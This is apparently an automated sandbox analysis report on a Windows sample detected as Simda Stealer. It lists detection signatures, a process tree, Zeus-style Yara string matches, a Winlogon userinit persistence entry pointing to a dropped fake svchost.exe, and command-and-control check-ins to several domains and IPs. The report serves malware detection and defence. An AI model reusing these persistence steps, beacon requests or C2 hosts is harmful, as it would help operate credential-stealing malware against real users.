Windows Analysis Report
uavINoSIQh.exe

Overview

General Information

Sample name:uavINoSIQh.exe
renamed because original name is a hash value
Original sample name:6cfcadc2ed5bb29ee8a1ff27c5b04c2481ee1e77.exe
Analysis ID:1553805
MD5:98422c3dece103de16c166c7fbea2f6c
SHA1:6cfcadc2ed5bb29ee8a1ff27c5b04c2481ee1e77
SHA256:8eb3e521e20b9c7bbc6e71980c64d4a76e3db810ac2bbefec0d7780116101e70
Tags:exeuser-NDA0E

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • uavINoSIQh.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\uavINoSIQh.exe" MD5: 98422C3DECE103DE16C166C7FBEA2F6C)
    • svchost.exe (PID: 7444 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: ACF1B66F47538D1828695BAE8D83EF23)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 4084 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 3788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 784 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 2604 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 1096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 900 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 6304 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 752 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 4628 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 3668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 820 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 6964 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 5632 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 2772 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 2936 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 1756 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 10076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 1812 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 9104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 3712 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 1900 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 5612 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 3964 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
00000002.00000003.1946484273.0000000002700000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1991936635.0000000000B00000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1729152425.0000000002700000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
Source | Rule | Description | Author | Strings
2.2.svchost.exe.26a3c00.6.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\uavINoSIQh.exe, ProcessId: 7384, TargetFilename: C:\Windows\apppatch\svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uavINoSIQh.exe", ParentImage: C:\Users\user\Desktop\uavINoSIQh.exe, ParentProcessId: 7384, ParentProcessName: uavINoSIQh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7444, ProcessName: svchost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 7444, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uavINoSIQh.exe", ParentImage: C:\Users\user\Desktop\uavINoSIQh.exe, ParentProcessId: 7384, ParentProcessName: uavINoSIQh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7444, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uavINoSIQh.exe", ParentImage: C:\Users\user\Desktop\uavINoSIQh.exe, ParentProcessId: 7384, ParentProcessName: uavINoSIQh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7444, ProcessName: svchost.exe


AV Detection

Source: uavINoSIQh.exe; Avira: detected
Source: uavINoSIQh.exe, ReversingLabs: Detection: 84%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: uavINoSIQh.exe, Joe Sandbox ML: detected

Compliance

Source: C:\Windows\apppatch\svchost.exe, Unpacked PE file: 2.2.svchost.exe.2640000.5.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Unpacked PE file: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Unpacked PE file: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Unpacked PE file: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Unpacked PE file: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Unpacked PE file: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.unpack
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Unpacked PE file: 0.2.uavINoSIQh.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exe, Unpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: uavINoSIQh.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62643 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62637 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62667 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62624 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62212 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62615 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62609 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62623 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62366 -> 178.162.203.211:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62607 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62626 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62634 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62650 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62608 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62645 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62370 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62593 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62625 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54953 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54955 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62648 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62613 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56880 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56876 -> 99.83.170.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56942 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54978 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:55002 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56896 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56920 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:55020 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54964 -> 99.83.170.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54965 -> 188.114.96.3:443
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
